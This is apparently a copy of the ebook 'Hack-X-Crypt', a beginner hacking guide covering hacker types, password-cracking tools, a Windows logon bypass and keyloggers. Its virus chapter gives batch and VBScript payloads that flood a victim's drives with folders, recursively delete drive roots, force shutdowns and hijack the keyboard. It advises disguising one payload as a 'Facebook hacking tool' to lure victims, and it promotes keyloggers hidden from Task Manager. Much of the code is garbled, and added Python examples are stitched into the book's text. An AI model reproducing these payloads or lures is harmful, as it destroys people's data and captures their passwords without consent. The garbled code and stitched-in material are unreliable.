
BY: UJJWAL SAHAY CO-FOUNDER1.droppdf.com/.../x9rjp/hack-x...tow-ujjwal-sahay.pdf · Ujjwal Sahay is...

Date post: 31-Dec-2019

BY: UJJWAL SAHAY CO-FOUNDER [www.thebigcomputing.com]

FIND OUT MORE STUFF LIKE THIS ON TheBigComputing.com

We cover unique Ethical Hacking and Performance improvement guides, News and Tutorials. Our aim is to make your digital life easy, pleasant and secure. Ujjwal is a regular author and also chief security administrator at the place, you can get solution of your queries

LEGAL DISCLAIMER

Any proceedings or activities regarding the material contained within this volume are exclusively your liability. Misuse of the information or tutorials in this book can result in criminal charges being brought against the persons in question. The authors and review analyzers will not be held responsible in the event any criminal charges are brought against any individuals for misusing the information in this book to break the law. This book contains material and resources that can be potentially destructive or dangerous. If you do not fully comprehend something in this book, don't study this book. Please refer to the laws and acts of your state/region/province/zone/territory or country before accessing, using, or in any other way utilizing these resources.

These materials and resources are for educational and research purposes only. Do not attempt to violate the law with anything enclosed here within. If this is your intention, then leave now. Neither the writer of this book, the review analyzers, the publisher, nor anyone else affiliated in any way is going to admit any responsibility for your proceedings, actions or trials.

ABOUT THE AUTHOR…

UJJWAL SAHAY is a sovereign Computer Security Consultant and has state-of-the-art familiarity in the field of computers. Also, UJJWAL SAHAY is a cyber-security expert certified by LUCIDEUS TECH and has definitive experience in the field of computers and ethical hacking. Ujjwal Sahay is the author of the book HACK-X CRYPT (A straightforward guide towards Ethical hacking and cyber security). Also, Ujjwal Sahay is the co-founder of the techno-hacking website www.thebigcomputing.com; he is the chief security consultant of the site. Sahay is, however, more well known for his significant work in the field of ethical hacking and cyber security. Sahay is currently pursuing his studies in computer science with specialization in cyber security at MITS GWALIOR. Get In Touch With Him At ujjwal@thebigcomputing.com

PREFACE

Computer hacking is the practice of altering computer hardware and software to carry out a goal outside of the creator's original intention. People who take part in computer hacking activities are often called hackers. The majority of people assume that hackers are computer criminals. They fail to recognize the fact that criminals and hackers are two entirely unrelated things. Hackers in reality are good and extremely intelligent people who, by using their knowledge in a constructive way, help organizations, companies, governments, etc. to secure credentials and secret information on the Internet. Years ago, no one had to worry about crackers breaking into their computer and installing Trojan viruses, or using their computer to send attacks against others. Now that things have changed, it's best to be aware of how to defend your computer from damaging intrusions and prevent black hat hackers. So, in this book you will uncover the finest ways to defend your computer systems from hackers. This book is written keeping one objective in mind: that a beginner who is not very familiar with computer hacking can easily attempt these hacks and recognize what we are trying to demonstrate. After reading this book you will come to recognize how hacking is affecting our everyday routine work and can be very hazardous in many fields, like bank account hacking etc. Moreover, after working through this volume in detail you will be capable of understanding how a hacker hacks and how you can defend yourself from these threats.

FOR ANY QUERIES AND SUGGESTIONS FEEL FREE TO CONTACT ME: [email protected]

In The Loving Memory of my DAD

Your hands so warm
Your voice so clear
I still remember your laughter
Like yesterday had never gone
I miss your words of encouragement
Words that kept me hanging on
Now you are gone
The tears keep flowing
Only hoping
That one day the pain will fade
Dad why did you have to go away
We love you and miss you
I know I will again see you someday

ACKNOWLEDGEMENTS…

Book or volume of this temperament is tremendously complex to write, particularly without support of the Almighty GOD. I am highly thankful to LATE DR. BAKSHI KAMESHWAR SRIVASTAVA, MRS. SHASHI BALA SRIVASTAVA, Mr. BAKSHI RAJESH PRASAD SINHA AND MRS. ARADHNA SINHA to trust on my capabilities, without their support and motivation it would not be promising to write this book. I express heartfelt credit to My Parents LATE PROF. SAMIR KUMAR SAHAY and MRS. SUMAN SAHAY without them I have no existence. I am also thanking MR. BAKSHI RAJEEV PRASAD SINHA, MRS. ANITA SINHA, MR. BAKSHI SANJEEV PRASAD SINHA, MRS. PRITY SINHA, MR. RAJESHWAR PRASAD and MRS. PUNAM SINHA who helped me at each and every step of my life by their precious support.

I am more than ever thankful to my colleague Saurabh Tripathi (Creative head @ THE BIG COMPUTING) for the review, analysis and suggestions for some good articles for this book and all individuals who facilitated me at various research stages of this volume.

UJJWAL SAHAY

FOOLISH ASSUMPTIONS…

I make a few assumptions about you:

• You're familiar with basic computer- and networking-related concepts and terms.
• You have a basic understanding of what hackers and malicious users do.
• You have access to a computer and a network on which to use these techniques.
• You have access to the Internet to obtain the various tools used in the ethical hacking process.
• You have permission to perform the hacking techniques described in this book.

Table of Contents

INTRODUCTION TO HACKERS
Communities of Hackers
Intention of Hackers
Types of Hackers
• White Hat Hackers
• Black Hat Hackers
• Grey Hat Hackers
CRACKERS
Intention of crackers
PHREAKS
Intention of phreaks
SCRIPT KIDDIES
Intention of script kiddies
Black Hat Hackers Strategy
HACKERS WANT YOUR PC…
CREATION OF VIRUS IN NOTEPAD
1.) To create a huge amount of folders on victim's desktop screen
2.) To create more folders in C, D, and E drive of victim's computer
3.) To format C, D: and E: drive of your computer
4.) Convey your friend a little message and shut down his/her computer
5.) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out
6.) Hack your friend's keyboard and make him type "You are a fool" simultaneously
7.) Open Notepad continually in your friend's computer
8.) THREATEN YOUR FRIEND BY MAKING SCREEN FLASH
Convert Batch files into Executable Programs
HACKING "OPEN" OPTION
PASSWORD CRACKING
Cracking passwords with hardcore tools
Password-cracking software
Cain & Abel
Brutus
Elcomsoft Distributed Password Recovery
Elcomsoft System Recovery
John the Ripper
ophcrack
Aircrack-NG
Proactive System Password Recovery
RainbowCrack
pwdump3
PASSWORD CREATING POLICIES
BYPASS WINDOWS LOGON SCREEN PASSWORD
KEYSTROKE LOGGING
Learn How to Hack Windows Experience Index
HACK TO HIDE LOCAL DRIVES
FORMAT HARD DISK WITH NOTEPAD
FUNNY VIRUS TO SHOCK YOUR FRIENDS
HOW TO CHANGE YOUR PROCESSOR NAME
HOW TO MAKE YOUR GOOGLE SEARCHES EFFECTIVE
IOS PASSWORD CRACKING
HACK TO HIDE THE RECYCLE BIN
HOW BOTNET DDoS ATTACK WORKS…
DDoS Attack?
Botnet?
Botnet Tools
SlowLoris
Tor's Hammer
Qslowloris
Apache Killer
PyLoris
DDoSim
Botnet DDoS Attacks
WEBSITE HACKING
TESTING SQL INJECTION BY USING TOOL
WI-FI HACKING USING BACKTRACK
NEWBIE'S WAY TOWARDS REVERSE ENGINEERING
EMAIL AND FACEBOOK HACKING BY PHISHING
Securing Pen Drives From Malicious Viruses
HOW TO PROTECT YOUR PDF FILES FROM COPYING
SENDING A MESSAGE TO OTHER USER IN YOUR PC
HOW TO CREATE A FOLDER WITH EMPTY NAME
HACKING ANDROID PHONE
FULL CONTROL YOUR PC BY PHONE
LAUNCHING WINDOWS GOD MODE
HOW TO CRACK ANDROID LOCK SCREEN
WI-FI CRACKING USING REAVER IN BACKTRACK
SOME USEFUL WINDOWS SHORTCUTS
HOW TO RECOVER PERMANENTLY DELETED FILES
CONCLUSION

Let's start

INTRODUCTION

INTRODUCTION TO HACKERS

First of all, before digging into intense hacking processes, let's take a look at what hacking is, who the hackers are, what their intentions are, the types of hackers, their communities, etc.

Communities of Hackers:

• HACKERS
• CRACKERS
• PHREAKS
• SCRIPT KIDDIES

HACKERS are the intelligent computer experts.

INTENTION OF HACKERS:

• To gain in-depth knowledge of any computer system: what is happening at the back end of any specific program, behind the screen of the computer system.

• Their motive is to find possible security risks and vulnerabilities in a computer system or network.

• They create security awareness among people by sharing knowledge and the proper security precautions that should be taken by the user.

Types of Hackers:

• White Hat Hackers – "White hats" is the name used for security experts. While they often use the same tools and techniques as the black hats, they do so in order to foil the bad guys. That is, they use those tools for ethical hacking and computer forensics. Ethical hacking is the process of using security tools to test and improve security (rather than to break it!). Computer forensics is the process of collecting evidence needed to identify and convict computer criminals.

• Black Hat Hackers – They use their knowledge and skill set for illegal activities and destructive intents. Obviously, the "black hats" are the bad guys. These are the people who create and send viruses and worms, break into computer systems, steal data, shut down networks, and basically commit electronic crimes. We talk about black hats at several points in this book. Black hat hackers and malware writers are not considered the same thing in the security community, even though they are both breaking the law.

• Grey Hat Hackers – They use their knowledge and skill set for both legal and illegal purposes. They are white hats in public but internally they do some black hat work. Gray hats sit in the middle of the fence because sometimes they cross that ethical line (or more often, define it differently). For example, gray hats will break into a company's computer system just to wander around and see what's there. They think that simply because they don't damage any data, they're not committing a crime. Then they go and apply for jobs as security consultants for large corporations. They justify their earlier break-in as some sort of computer security training. Many really believe that they're providing a public service by letting companies know that their computers are at risk.

CRACKERS are those who break into applications with malicious intentions, either for their personal gain or their greedy achievements.

Intention of crackers:

• Their motive is to get unauthorized access into a system and cause damage, or destroy or reveal confidential information.

• To compromise the system to deny services to legitimate users, to trouble or harass them or to take revenge.

• It can cause financial losses and image/reputation damage, and defamation in society for individuals or organizations.

PHREAKS are those people who use computer devices and software programs, and their tricky and sharp minds, to break into phone networks.

Intention of phreaks:

• To find loopholes in the security of phone networks and to make phone calls and access the internet free of cost!!! You may get a spoofed call or a big bill. You can also get a call from your own number.

SCRIPT KIDDIES: These are computer novices who take advantage of the hacker tools, vulnerability scanners, and documentation available free on the Internet but who don't have any real knowledge of what's really going on behind the scenes. They know just enough to cause you headaches but typically are very sloppy in their actions, leaving all sorts of digital fingerprints behind. Even though these guys are the stereotypical hackers that you hear about in the news media, they often need only minimal skills to carry out their attacks.

Intention of script kiddies:

• They use the available information about known vulnerabilities to break into network systems.

• It's an act performed for fun or out of curiosity.

Black Hat Hackers Strategy:

• Information Gathering & Scanning
• Getting Access on the website
• Maintain the access
• Clear the Tracks

Conclusion: Security is important because prevention is better than cure.

HACKERS WANT YOUR PC…

You might be thinking that hackers don't care about your computer, but they do. Hackers want access to your system for many different reasons. Remember, once a hacker breaks in and plants a Trojan, the door is open for anyone to return. The hackers know this and are making money from it. They know it's easy to hide and very difficult to track them back once they own your PC.

Overall, the Internet is an easy place to hide. Compromised computers around the world have helped to make hiding simple. It is easy to find the last IP address from where an attack was launched, but hackers hop through many unsecured systems to hide their location before they launch attacks.

An IP address is a unique address that identifies where a computer is connected to the Internet. Every computer, even yours if you're using broadband access, has an Internet protocol (IP) address.

Over the past four years, most cyber-attacks have been launched from computers within INDIA. However, this doesn't mean that systems in INDIA are the original source of the attack. A hacker in Pakistan could actually use your computer to launch a denial of service (DOS) attack. To the entire world, it might even look as if you started the attack because the hacker has hidden his tracks so that only the last "hop" can be traced.

VIRUS CREATIONS

CREATION OF VIRUS IN NOTEPAD

Now, it's time to administrate your computer by creating some viruses in the form of batch files. You can create various types of viruses having distinct functionality. Each and every virus will affect the victim's computer system by the way you have coded its programming in the batch file. You can create viruses which can freeze the victim's computer or it can also crash it.

Virus creation codes of the batch file:
- Codes to be written in the notepad
- Extension of the files should be ".bat"

1.) To create a huge amount of folders on victim's desktop screen:

First of all your task is to copy the following codes in the notepad of your computer. For opening the notepad: go to the run option of your computer by pressing "window + R". Simply type "notepad" and click on the OK option.

CODES:@echooff

:topmd%random%gototop.

Now when you have copied the codes in the notepad your next work is to save the text document you have created. Go to the file option and save your document by any name, but don't forget to keep the extension as '.bat'.

For example you can save your text document by the name "ujjwal.bat"

Or you can also keep your document name as "Facebook hacking tool.bat" to confuse the victim and enforce him to open the virus you have created to destroy the desktop of the victim.

When you have done saving the document just double click on the batch file to open it.

Suddenly you will see that the command prompt of the victim's computer opens automatically and displays a large amount of code running in the command prompt. After 5-10 seconds you will see that a huge amount of folders has been created automatically on the desktop of the victim, and it will also lead the desktop to freeze or crash.

2.) To create more folders in C, D, and E drive of victim's computer:

As we have learned above to create many folders on the desktop of the victim, in the same way we can create a lot of folders in the C:, D:, and E: drives of the victim's computer by applying the same method as we have followed above, but there is a little amendment in the codes of the batch file of this virus.

CODES:@echooff

:VIRUScd/dC:md%random%cd/dD:md%random%cd/dE:md%random%gotoVIRUS

Copy and paste the above code in the notepad and follow the same steps as we have followed before to create more folders in the local drives of the victim's computer.

3.) To format C, D: and E: drive of your computer:

Open Notepad
Copy the below command there

"rd/s/qD:\rd/s/qC:\rd/s/qE:\"(Withoutquotes)Saveas"anything.bat

Double click on the virus icon. This virus formats the C, D and E Drive in 5 Seconds.

4.) Convey your friend a little message and shut down his/her computer:

@echooff

msg*Idon'tlikeyoushutdown-c"Error!Youaretoostupid!"-s

Save it as "Anything.BAT" in All Files and send it.

5.) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:

Open the notepad and type the following code:

WScript.Sleep180000WScript.Sleep10000SetWshShell=WScript.CreateObject("WScript.Shell")WshShell.Run"notepad"WScript.Sleep100WshShell.AppActivate"Notepad"WScript.Sleep500WshShell.SendKeys"Hel"WScript.Sleep500WshShell.SendKeys"lo"WScript.Sleep500WshShell.SendKeys",ho"

WScript.Sleep500WshShell.SendKeys"wa"WScript.Sleep500WshShell.SendKeys"re"WScript.Sleep500WshShell.SendKeys"you"WScript.Sleep500WshShell.SendKeys"?"WScript.Sleep500WshShell.SendKeys"Ia"WScript.Sleep500WshShell.SendKeys"mg"WScript.Sleep500WshShell.SendKeys"ood"

WScript.Sleep500WshShell.SendKeys"th"WScript.Sleep500WshShell.SendKeys"ank"WScript.Sleep500WshShell.SendKeys"s!"

Save it as "Anything.VBS" and send it.

6.) Hack your friend's keyboard and make him type "You are a fool" simultaneously:

Open the notepad and type the following codes:

SetwshShell=wscript.CreateObject("WScript.Shell")dowscript.sleep100wshshell.sendkeys"Youareafool."loop

Save it as "Anything.VBS" and send it.

7.) Open Notepad continually in your friend's computer:

Openthenotepadandtypethefollowingcodes:@ECHOoff:topSTART%SystemRoot%\system32\notepad.exeGOTOtop

Save it as "Anything.BAT" and send it.

8.) THREATEN YOUR FRIEND BY MAKING SCREEN FLASH

To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.

@echooffechoe100B81300CD10E44088C3E44088C7F6E330>\z.dbgechoe110DF88C1BAC80330C0EEBADA03ECA808

75>>\z.dbgechoe120FBECA80874FBBAC90388D8EE88F8EE88>>\z.dbgechoe130C8EEB401CD1674CDB80300CD10C3>>\z.dbgechog=100>>\z.dbgechoq>>\z.dbgdebug<\z.dbg>nuldel\z.dbg

But if you really want to mess with a friend then copy and paste the following code, which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.

Codes:

@echooff:aechoe100B81300CD10E44088C3E44088C7F6E330>\z.dbgechoe110DF88C1BAC80330C0EEBADA03ECA80875>>\z.dbgechoe120

FBECA80874FBBAC90388D8EE88F8EE88>>\z.dbgechoe130C8EEB401CD1674CDB80300CD10C3>>\z.dbgechog=100>>\z.dbgechoq>>\z.dbgdebug<\z.dbg>nuldel\z.dbggotoa

To disable error (ctrl+shift+esc) then end process wscript.exe Enjoy!!!

Note: some of the above given codes can harm your computer after execution, so don't try them on your PC. You can use a test computer for it.
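From the defender's side, the behaviours described in this chapter (endless folder creation, endless Notepad windows, deleting a drive root, forced shutdown, machine code fed to debug) leave simple static traces in a batch file. The following triage scanner is an added example, not code from the book; the rule names, function names and the sample scripts are constructed for illustration.

```python
import re

# Single-line indicators, matched against lower-cased, trimmed lines.
LINE_RULES = [
    ("recursive delete of a drive root",
     re.compile(r"^(?:rd|rmdir)\s+(?=.*/s\b).*\b[a-z]:\\?$")),
    ("forced shutdown", re.compile(r"^shutdown\b.*\s[-/]s\b")),
    ("machine code piped into debug.exe", re.compile(r"^debug\b.*<")),
]
# Indicators that only matter inside a loop that has no exit path.
LOOP_RULES = [
    ("unbounded folder-creation loop", re.compile(r"^(?:md|mkdir)\b.*%random%")),
    ("unbounded process-spawn loop", re.compile(r"^start\b")),
]


def _normalise(script):
    """Lower-case every line, drop blanks/comments and the '@' echo suppressor."""
    lines = []
    for raw in script.splitlines():
        line = raw.strip().lower().lstrip("@").strip()
        if line and not line.startswith(("rem ", "::")):
            lines.append(line)
    return lines


def _unbounded_loops(lines):
    """Yield the body of each ':label ... goto label' block with no exit."""
    labels = {l[1:].split()[0]: i for i, l in enumerate(lines)
              if l.startswith(":") and len(l) > 1}
    for j, line in enumerate(lines):
        # Only a bare 'goto' counts: 'if ... goto x' is a conditional jump.
        m = re.match(r"^goto\s+:?(\S+)", line)
        if not m:
            continue
        start = labels.get(m.group(1))
        if start is None or start >= j:
            continue  # forward jump or unknown label, not a loop
        body = lines[start + 1:j]
        if not any(b.startswith(("if ", "exit")) for b in body):
            yield body


def triage(script):
    """Return the list of findings for one batch script (empty list = clean)."""
    lines = _normalise(script)
    findings = [name for name, rx in LINE_RULES
                if any(rx.search(l) for l in lines)]
    for body in _unbounded_loops(lines):
        for name, rx in LOOP_RULES:
            if name not in findings and any(rx.search(l) for l in body):
                findings.append(name)
    return findings


# Constructed sample scripts (not real captures), one per behaviour.
SAMPLES = {
    "folder_flood.bat": ["@echo off", ":top", "md %random%", "goto top"],
    "wipe_and_shutdown.bat": ["@echo off", "rd /s /q D:\\",
                              'shutdown -c "bye" -s'],
    "debug_dropper.bat": ["@echo off", "echo q>>\\z.dbg", "debug<\\z.dbg>nul"],
    "notepad_spawn.bat": ["@ECHO off", ":top",
                          "START %SystemRoot%\\system32\\notepad.exe",
                          "GOTO top"],
    # Benign build helper: bounded loop, deletes a sub-folder only.
    "build_cleanup.bat": ["@echo off", "set n=0", ":next", "md build_%n%",
                          "set /a n+=1", "if %n% lss 3 goto next",
                          "rd /s /q build_tmp"],
}


def scan_samples():
    """Run triage over every constructed sample and return {name: findings}."""
    return {name: triage("\n".join(body)) for name, body in SAMPLES.items()}


if __name__ == "__main__":
    for name, findings in scan_samples().items():
        print(f"{name}: {findings or 'no findings'}")
```

A finding is a reason to open the file in a text editor before anyone double-clicks it; a legitimate admin script can also call shutdown, so the output is a triage hint rather than a verdict.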

BATCH TO EXE CONVERSION

Convert Batch files into Executable Programs

Batch files and executable files work in almost the same way. Basically both are a set of instructions and logic for command execution. But we usually prefer executable files as they are more convenient than batch ones.

But why would we want that? Some of the reasons are listed below:

1. We can include extra tools in our EXE dependent batch file.
2. Moreover EXE provides protection to the source script to restrict modification.
3. EXE files can be pinned to the Windows start menu as well as the taskbar.

Here we are using a tool called "Batch to exe converter" which provides you a platform to run batch files as executable files. You can download it from here

"Bat to Exe Converter" is a flow conversion program whose purpose is to help you easily obtain executable files out of batch items. If you prefer to convert a BATCH file into an executable one easily, "Bat to Exe Converter" is a simple and yet effective solution.

The application provides you with a simplified interface, which makes it comfortable for both beginner and advanced users. From its primary window, you have the ability to select the desired batch file and output file. Then, you will be able to customize your settings according to your choice and preferences.

Another interesting and compatible feature is that you can choose the language for your EXE file, the choices being English or German. From the Options tab, users can opt to create a visible or invisible application, which means displaying a console window or not. However, if you want to encrypt the resulting EXE file, you can protect it with a security password.

MESSING UP WITH REGISTRY

HACKING "OPEN" OPTION

If we want to open any folder, either we double click on the folder or we right click on it, which shows us a dialogue box with the OPEN option at the top.

Today we are going to learn how to hack the "OPEN" option by replacing it with any text you want.

STEPS:

Go to the "run" option, type "regedit" and click on OK.

Note: "regedit" stands for registry editing.

Registry: it is responsible for saving the binary equivalent working of every application in the operating system.

Then the registry editing window will open in front of you. It has five options.

1. HKEY_CLASSES_ROOT
2. HKEY_CURRENT_USER
3. HKEY_LOCAL_MACHINE
4. HKEY_USERS
5. HKEY_CURRENT_CONFIG

Then you have to click on "HKEY_CLASSES_ROOT". It will open and you will see a lot of items under it. Search for the "FOLDER" option under it.

Click on the folder option to open it. When you open the folder option you will see the "SHELL" option. By opening the "SHELL" option you will see the "OPEN" option under it. Just give a single click on the open option instead of opening it. You will see two items defined in the left white workspace.

Just open the "Default" string (1st option). Do not touch the value name. Type anything by which you want to replace your "open" option.

For example I am typing here "your computer is hacked by Ujjwal Sahay".

Then click on the OK option. Now go to any folder and just right click on it.

Woooooo! Now the open option is changed to the text "your computer is hacked by Ujjwal Sahay".

PASSWORD CRACKING EXPLAINED

PASSWORD CRACKING

Password crackers are the most famous and elementary tools in the hacker's toolbox.

These have been around for some time and are fairly effective at "guessing" most users' passwords, at least in part because most users do a very poor job of selecting secure passwords.

First of all, if a hacker is going to crack your password, then at the very first step they usually try some guesses. They generally make this easier through social engineering. Hackers know that most users select simple passwords that are easy to remember. The top choices are nearly always names that are personally meaningful to the user: first names of immediate family members lead the list, followed by pets' names and favorite sporting teams. Password crackers may end up loading full English dictionaries, but they can hit a fair number of passwords with the contents of any popular baby name book. Other poor password selections include common numbers and numbers that follow a common format such as phone numbers and social security numbers.

Compounding the problem, many users set the same username and password for all accounts, allowing hackers to have a field day with a single harvested password. That's something to consider before you use the same password for Facebook as you use at school or at work. The key to creating a good password is to create something that someone cannot guess or easily crack. Using your pet's name therefore is not a good technique. Using your login name is also a bad technique because someone who knows your login (or your name, since many login names are simply variations on your surname) could easily break into your system.

Cracking passwords with hardcore tools

High-tech password cracking involves using a program that tries to guess a password by determining all possible password combinations. These high-tech methods are mostly automated after you access the computer and password database files. The main password-cracking methods are dictionary attacks, brute force attacks, and rainbow attacks. You find out how each of these works in the following sections.

Password-cracking software:

You can try to crack your organization's operating system and application passwords with various password-cracking tools:

Cain & Abel: Cain and Abel is a well-known password cracking tool that is capable of handling a variety of tasks. The most notable thing is that the tool is only available for Windows platforms. It can work as a sniffer in the network, cracking encrypted passwords using dictionary attacks, brute force attacks and cryptanalysis attacks, revealing password boxes, uncovering cached passwords, decoding scrambled passwords, and analyzing routing protocols. It is used to crack LM and NT LAN Manager (NTLM) hashes, Windows RDP passwords, Cisco IOS and PIX hashes, VNC passwords, RADIUS hashes, and lots more. (Hashes are cryptographic representations of passwords.)

Brutus: Brutus is one of the most popular remote online password cracking tools. It claims to be the fastest and most flexible password cracking tool. This tool is free and is only available for Windows systems. It was released back in October 2000.

It supports HTTP (Basic Authentication), HTTP (HTML Form/CGI), POP3, FTP, SMB, Telnet and other types such as IMAP, NNTP, NetBus, etc. You can also create your own authentication types. This tool also supports multi-stage authentication engines and is able to connect to 60 simultaneous targets. It also has resume and load options, so you can pause the attack process any time and then resume whenever you want.

Elcomsoft Distributed Password Recovery: (www.elcomsoft.com/edpr.html) cracks Windows, Microsoft Office, PGP, Adobe, iTunes, and numerous other passwords in a distributed fashion using up to 10,000 networked computers at one time. Plus, this tool uses the same graphics processing unit (GPU) video acceleration as the Elcomsoft Wireless Auditor tool, which allows for cracking speeds up to 50 times faster.

Elcomsoft System Recovery: (www.elcomsoft.com/esr.html) cracks or resets Windows user passwords, sets administrative rights, and resets password expirations, all from a bootable CD.

John the Ripper: (www.openwall.com/john) John the Ripper is another well-known free open source password cracking tool for Linux, UNIX and Mac OS X. A Windows version is also available. This tool can detect weak passwords. A pro version of the tool is also available, which offers better features and native packages for target operating systems.

ophcrack: (http://ophcrack.sourceforge.net) cracks Windows user passwords using rainbow tables from a bootable CD. Rainbow tables are pre-calculated password hashes that can help speed up the cracking process.

Aircrack-NG: (http://www.aircrack-ng.org/) Aircrack-NG is a WiFi password cracking tool that can crack WEP or WPA passwords. It analyzes wireless encrypted packets and then tries to crack passwords via its cracking algorithm. It is available for Linux and Windows systems. A live CD of Aircrack is also available.

Proactive System Password Recovery: (www.elcomsoft.com/pspr.html) recovers practically any locally stored Windows password, such as logon passwords, WEP/WPA passphrases, SYSKEY passwords, and RAS/dialup/VPN passwords.

RainbowCrack: (http://project-rainbowcrack.com) RainbowCrack is a hash cracker tool that uses a large-scale time-memory tradeoff process for faster password cracking than traditional brute force tools. Time-memory tradeoff is a computational process in which all plaintext and hash pairs are calculated by using a selected hash algorithm. After computation, results are stored in the rainbow table. This process is very time consuming. But, once the table is ready, it can crack a password much faster than brute force tools. You also do not need to generate rainbow tables by yourselves. Developers of RainbowCrack have also generated LM rainbow tables, NTLM rainbow tables, MD5 rainbow tables and Sha1 rainbow tables. Like RainbowCrack, these tables are also available for free. You can download these tables and use them for your password cracking processes.

pwdump3: (www.openwall.com/passwords/microsoftwindowsnt-2000-xp-2003-vista-7#pwdump) extracts Windows password hashes from the SAM (Security Accounts Manager) database.

Password storage locations vary by operating system:

Windows usually stores passwords in these locations:

• Security Accounts Manager (SAM) database (c:\winnt\system32\config) or (c:\windows\system32\config)

• Active Directory database file that's stored locally or spread across domain controllers (ntds.dit)

Windows may also store passwords in a backup of the SAM file in the c:\winnt\repair or c:\windows\repair directory.

Some Windows applications store passwords in the Registry or as plaintext files on the hard drive! A simple registry or file-system search for "password" may uncover just what you're looking for.

Linux and other UNIX variants typically store passwords in these files:

• /etc/passwd (readable by everyone)
• /etc/shadow (accessible by the system and the root account only)
• /.secure/etc/passwd (accessible by the system and the root account only)
• /etc/security/passwd (accessible by the system and the root account only)

MUST HAVE PASSWORD POLICIES

PASSWORD CREATING POLICIES

As an ethical hacker, you should show users the importance of securing their passwords. Here are some tips on how to do that:

Demonstrate how to create secure passwords:- people generally create their passwords using only words, which can be less secure.

Show what can happen when weak passwords are used or passwords are shared.

Diligently build user awareness of social engineering attacks.

Encourage the use of a strong password-creation policy that includes the following criteria:

• Use punctuation characters to separate words.

• Use upper and lowercase letters, special characters, and numbers. Never use only numbers. Such passwords can be cracked quickly.

• Change passwords every 15 to 30 days or immediately if they're suspected of being compromised.

• Use different passwords for each system. This is especially important for network infrastructure hosts, such as servers, firewalls, and routers. It's okay to use similar passwords; just make them slightly different for each type of system, such as wweraw777-Win7 for Windows systems and wweraw453 for Linux systems.

• Use variable-length passwords. This trick can throw off attackers because they won't know the required minimum or maximum length of passwords and must try all password length combinations.

• Don't use common slang words or words that are in a dictionary.

• Don't rely completely on similar-looking characters, such as 3 instead of E, 5 instead of S, or ! instead of 1. Password-cracking programs can check for this.

• Use password-protected screen savers. Unlocked screens are a great way for systems to be compromised even if their hard drives are encrypted.

• Don't reuse the same password within at least four to five password changes.

• Don't share passwords. To each his or her own!

• Avoid storing user passwords in an unsecured central location, such as an unprotected spreadsheet on a hard drive. This is an invitation for disaster. Use Password Safe or a similar program to store user passwords.
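One way to enforce the criteria above when a user changes a password, as an added example that is not code from the book: it checks character classes, digits-only passwords, dictionary words hidden behind look-alike characters, and reuse within the last five changes. MIN_LENGTH, the word list, the function names and the look-alike pairs beyond 3, 5 and ! are assumptions made for the illustration.

```python
import hashlib
import hmac
import os
import string

MIN_LENGTH = 10      # assumption: the text sets no minimum length
HISTORY_DEPTH = 5    # text: no reuse within four to five password changes
# Constructed sample; a deployment would load a full dictionary and slang list.
WORDLIST = {"password", "welcome", "dragon", "monkey", "secret", "letmein"}

# 3->e, 5->s and !->1 come from the text; the other pairs are assumed extras.
_BASE = {"3": "e", "5": "s", "0": "o", "@": "a", "4": "a", "$": "s", "7": "t"}
# "1" (and "!" standing in for it) can be read as either "i" or "l".
_TABLES = [str.maketrans({**_BASE, "1": c, "!": c}) for c in ("i", "l")]


def normalized_forms(password):
    """Undo look-alike substitutions and keep letters only, one form per reading."""
    forms = set()
    for table in _TABLES:
        text = password.lower().translate(table)
        forms.add("".join(ch for ch in text if ch.isalpha()))
    return forms


def hash_for_history(password, salt=None):
    """Salted PBKDF2 record, so the history never stores old passwords in clear."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest


def was_used_recently(password, history):
    """Compare against the last HISTORY_DEPTH stored (salt, digest) records."""
    for salt, digest in list(history)[-HISTORY_DEPTH:]:
        if hmac.compare_digest(hash_for_history(password, salt)[1], digest):
            return True
    return False


def check_password(password, history=()):
    """Return the list of policy violations; an empty list means acceptable."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append("too_short")
    if password.isdigit():
        problems.append("digits_only")
    classes = [
        ("missing_upper", str.isupper),
        ("missing_lower", str.islower),
        ("missing_digit", str.isdigit),
        ("missing_special", lambda ch: ch in string.punctuation),
    ]
    for name, predicate in classes:
        if not any(predicate(ch) for ch in password):
            problems.append(name)
    if any(word in form for form in normalized_forms(password) for word in WORDLIST):
        problems.append("dictionary_word")
    if was_used_recently(password, history):
        problems.append("reused")
    return problems


if __name__ == "__main__":
    for candidate in ("12345678901", "P@55w0rd!2024", "vX9#qT2-mLr8"):
        print(candidate, check_password(candidate))
```

The second sample passes every character-class rule and still fails, which is the point of the look-alike criterion in the list.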

KON BOOT

BYPASS WINDOWS LOGON SCREEN PASSWORD

Sometimes it creates a critical situation if you forget your Windows administrator password and it's quite urgent to recover it without any flaw. This article will make it convenient to recover your admin password.

We are using a tool named KON-BOOT.

Kon-Boot is an application which will bypass the authentication process of Windows based operating systems. It enables you to log in to any password protected test machine without any knowledge of the password.

Kon-Boot works with both 64-bit and 32-bit Microsoft Windows operating systems.

Things needed:–

• A pen drive or any USB device such as a memory card, or a blank CD.

• Kon-Boot (latest version)

• Your 5 minutes and also a working mind.

Technical instructions:–

1. Download KON-BOOT from the internet.

2. Extract the ZIP and run the "KonBootInstaller.exe".

3. Burn the ISO.

4. Boot from the CD/USB device.

5. After Windows is loaded it will show you a Kon-boot screen.

6. Leave the password box empty and just hit OK; it will directly let you into the Windows account.

Limitations: IT MAY CAUSE BSOD (NOTEPAD PARTICULAR BUGS).

KEYLOGGERS

BE AWARE KEYSTROKE LOGGING

One of the best techniques for capturing passwords is remote keystroke logging: the use of software or hardware to record keystrokes as they're typed into the computer.

Generally you ask your friends or relatives to let you log in to your account from their computers.

So, be careful with keyloggers installed on their computers. Even with good intentions, monitoring employees raises various legal issues if it's not done correctly. Discuss with your legal counsel what you'll be doing, ask for their guidance, and get approval from upper management.

Logging tools:- With keystroke-logging tools, you can assess the log files of your application to see what passwords people are using:

Keystroke-logging applications can be installed on the monitored computer.

I suggest you check out Family Keylogger by (www.spyarsenel.com). Another popular tool is Invisible KeyLogger Stealth; dozens of other such tools are available on the Internet.

One more you can check out is KGB Employee Monitor, which is one of my favorites, because it is not only invisible but is also not shown by your task manager, and it uses password protection too.

Hardware-based tools, such as KeyGhost (www.keyghost.com), fit between the keyboard and the computer or replace the keyboard altogether. A keystroke-logging tool installed on a shared computer can capture the passwords of every user who logs in.

